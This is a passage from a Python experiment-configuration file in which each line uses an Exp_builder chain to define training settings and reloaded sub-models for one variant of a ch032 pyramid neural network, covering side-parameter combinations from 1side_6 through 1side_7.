ch032_1side_6__2side_5__3side_1_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_6__2side_5__3side_1_4side_1_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s6__2s5__3s1__4s1") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_6__2side_5__3side_1_4side_1, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_6__2side_5__3side_2_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_6__2side_5__3side_2_4side_1_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s6__2s5__3s2__4s1") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_6__2side_5__3side_2_4side_1, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_6__2side_5__3side_2_4side_2 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_6__2side_5__3side_2_4side_2_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s6__2s5__3s2__4s2") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_6__2side_5__3side_2_4side_2, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_6__2side_5__3side_3_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_6__2side_5__3side_3_4side_1_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s6__2s5__3s3__4s1") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_6__2side_5__3side_3_4side_1, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_6__2side_5__3side_3_4side_2 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_6__2side_5__3side_3_4side_2_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s6__2s5__3s3__4s2") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_6__2side_5__3side_3_4side_2, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_6__2side_5__3side_3_4side_3 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_6__2side_5__3side_3_4side_3_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s6__2s5__3s3__4s3") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_6__2side_5__3side_3_4side_3, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_6__2side_5__3side_4_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_6__2side_5__3side_4_4side_1_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s6__2s5__3s4__4s1") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_6__2side_5__3side_4_4side_1, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_6__2side_5__3side_4_4side_2 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_6__2side_5__3side_4_4side_2_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s6__2s5__3s4__4s2") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_6__2side_5__3side_4_4side_2, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_6__2side_5__3side_4_4side_3 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_6__2side_5__3side_4_4side_3_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s6__2s5__3s4__4s3") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_6__2side_5__3side_4_4side_3, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_6__2side_5__3side_4_4side_4 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_6__2side_5__3side_4_4side_4_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s6__2s5__3s4__4s4") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_6__2side_5__3side_4_4side_4, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_6__2side_5__3side_5_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_6__2side_5__3side_5_4side_1_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s6__2s5__3s5__4s1") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_6__2side_5__3side_5_4side_1, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_6__2side_5__3side_5_4side_2 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_6__2side_5__3side_5_4side_2_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s6__2s5__3s5__4s2") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_6__2side_5__3side_5_4side_2, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_6__2side_5__3side_5_4side_3 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_6__2side_5__3side_5_4side_3_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s6__2s5__3s5__4s3") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_6__2side_5__3side_5_4side_3, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_6__2side_5__3side_5_4side_4 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_6__2side_5__3side_5_4side_4_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s6__2s5__3s5__4s4") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_6__2side_5__3side_5_4side_4, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_6__2side_5__3side_5_4side_5 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_6__2side_5__3side_5_4side_5_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s6__2s5__3s5__4s5") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_6__2side_5__3side_5_4side_5, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_6__2side_6__3side_1_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_6__2side_6__3side_1_4side_1_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s6__2s6__3s1__4s1") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_6__2side_6__3side_1_4side_1, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_6__2side_6__3side_2_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_6__2side_6__3side_2_4side_1_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s6__2s6__3s2__4s1") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_6__2side_6__3side_2_4side_1, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_6__2side_6__3side_2_4side_2 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_6__2side_6__3side_2_4side_2_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s6__2s6__3s2__4s2") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_6__2side_6__3side_2_4side_2, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_6__2side_6__3side_3_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_6__2side_6__3side_3_4side_1_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s6__2s6__3s3__4s1") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_6__2side_6__3side_3_4side_1, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_6__2side_6__3side_3_4side_2 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_6__2side_6__3side_3_4side_2_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s6__2s6__3s3__4s2") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_6__2side_6__3side_3_4side_2, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_6__2side_6__3side_3_4side_3 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_6__2side_6__3side_3_4side_3_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s6__2s6__3s3__4s3") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_6__2side_6__3side_3_4side_3, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_6__2side_6__3side_4_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_6__2side_6__3side_4_4side_1_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s6__2s6__3s4__4s1") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_6__2side_6__3side_4_4side_1, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_6__2side_6__3side_4_4side_2 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_6__2side_6__3side_4_4side_2_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s6__2s6__3s4__4s2") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_6__2side_6__3side_4_4side_2, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_6__2side_6__3side_4_4side_3 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_6__2side_6__3side_4_4side_3_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s6__2s6__3s4__4s3") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_6__2side_6__3side_4_4side_3, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_6__2side_6__3side_4_4side_4 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_6__2side_6__3side_4_4side_4_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s6__2s6__3s4__4s4") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_6__2side_6__3side_4_4side_4, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_6__2side_6__3side_5_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_6__2side_6__3side_5_4side_1_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s6__2s6__3s5__4s1") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_6__2side_6__3side_5_4side_1, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_6__2side_6__3side_5_4side_2 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_6__2side_6__3side_5_4side_2_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s6__2s6__3s5__4s2") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_6__2side_6__3side_5_4side_2, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_6__2side_6__3side_5_4side_3 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_6__2side_6__3side_5_4side_3_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s6__2s6__3s5__4s3") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_6__2side_6__3side_5_4side_3, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_6__2side_6__3side_5_4side_4 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_6__2side_6__3side_5_4side_4_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s6__2s6__3s5__4s4") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_6__2side_6__3side_5_4side_4, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_6__2side_6__3side_5_4side_5 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_6__2side_6__3side_5_4side_5_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s6__2s6__3s5__4s5") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_6__2side_6__3side_5_4side_5, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_6__2side_6__3side_6_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_6__2side_6__3side_6_4side_1_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s6__2s6__3s6__4s1") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_6__2side_6__3side_6_4side_1, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_6__2side_6__3side_6_4side_2 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_6__2side_6__3side_6_4side_2_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s6__2s6__3s6__4s2") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_6__2side_6__3side_6_4side_2, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_6__2side_6__3side_6_4side_3 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_6__2side_6__3side_6_4side_3_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s6__2s6__3s6__4s3") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_6__2side_6__3side_6_4side_3, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_6__2side_6__3side_6_4side_4 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_6__2side_6__3side_6_4side_4_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s6__2s6__3s6__4s4") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_6__2side_6__3side_6_4side_4, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_6__2side_6__3side_6_4side_5 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_6__2side_6__3side_6_4side_5_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s6__2s6__3s6__4s5") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_6__2side_6__3side_6_4side_5, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_6__2side_6__3side_6_4side_6 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_6__2side_6__3side_6_4side_6_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s6__2s6__3s6__4s6") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_6__2side_6__3side_6_4side_6, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
# 1 3 6 10 15 21 "28" 36 45 55
# side7 OK 84
ch032_1side_7__2side_1__3side_1_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_7__2side_1__3side_1_4side_1_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s7__2s1__3s1__4s1") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_7__2side_1__3side_1_4side_1, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_7__2side_2__3side_1_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_7__2side_2__3side_1_4side_1_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s7__2s2__3s1__4s1") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_7__2side_2__3side_1_4side_1, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_7__2side_2__3side_2_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_7__2side_2__3side_2_4side_1_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s7__2s2__3s2__4s1") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_7__2side_2__3side_2_4side_1, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
